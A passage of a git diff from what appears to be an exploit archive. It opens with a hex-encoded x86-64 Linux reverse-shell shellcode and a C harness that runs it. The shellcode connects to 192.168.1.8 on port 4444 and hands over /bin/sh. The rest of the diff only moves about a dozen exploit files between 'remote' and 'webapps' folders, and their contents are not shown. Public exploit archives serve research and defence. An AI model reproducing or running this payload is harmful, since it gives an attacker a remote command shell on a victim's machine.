"\x55\x48\x89\xe5\x48\x31\xd2\x6a\x01\x5e\x6a\x02\x5f\x6a\x29\x58\x0f\x05\x48\x83\xec\x08\xc7\x04\x24\x02\x00\x11\x5c\xc7\x44\x24\x04\xc0\xa8\x01\x08\x48\x8d\x34\x24\x48\x83\xc4\x08\x5b\x48\x31\xdb\x6a\x10\x5a\x6a\x03\x5f\x6a\x2a\x58\x0f\x05\x48\x31\xf6\xb0\x21\x0f\x05\x48\xff\xc6\x48\x83\xfe\x02\x7e\xf3\x48\x31\xc0\x48\x31\xf6\x48\xbf\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x56\x57\x48\x89\xe7\x48\x31\xd2\xb0\x3b\x0f\x05"; +main() +{ + int (*ret)() = (int(*)())shellcode; + ret(); +} diff --git a/platforms/linux/remote/14818.pl b/platforms/linux/webapps/14818.pl similarity index 100% rename from platforms/linux/remote/14818.pl rename to platforms/linux/webapps/14818.pl diff --git a/platforms/linux/remote/18932.py b/platforms/linux/webapps/18932.py similarity index 100% rename from platforms/linux/remote/18932.py rename to platforms/linux/webapps/18932.py diff --git a/platforms/linux/remote/20064.py b/platforms/linux/webapps/20064.py similarity index 100% rename from platforms/linux/remote/20064.py rename to platforms/linux/webapps/20064.py diff --git a/platforms/linux/remote/30472.rb b/platforms/linux/webapps/30472.rb similarity index 100% rename from platforms/linux/remote/30472.rb rename to platforms/linux/webapps/30472.rb diff --git a/platforms/multiple/remote/33578.txt b/platforms/multiple/webapps/33578.txt similarity index 100% rename from platforms/multiple/remote/33578.txt rename to platforms/multiple/webapps/33578.txt diff --git a/platforms/php/remote/35588.rb b/platforms/php/webapps/35588.rb similarity index 100% rename from platforms/php/remote/35588.rb rename to platforms/php/webapps/35588.rb diff --git a/platforms/windows/remote/14547.txt b/platforms/windows/webapps/14547.txt similarity index 100% rename from platforms/windows/remote/14547.txt rename to platforms/windows/webapps/14547.txt 
diff --git a/platforms/windows/remote/23875.txt b/platforms/windows/webapps/23875.txt similarity index 100% rename from platforms/windows/remote/23875.txt rename to platforms/windows/webapps/23875.txt diff --git a/platforms/windows/remote/26012.rb b/platforms/windows/webapps/26012.rb similarity index 100% rename from platforms/windows/remote/26012.rb rename to platforms/windows/webapps/26012.rb diff --git a/platforms/windows/remote/35410.py b/platforms/windows/webapps/35410.py similarity index 100% rename from platforms/windows/remote/35410.py rename to platforms/windows/webapps/35410.py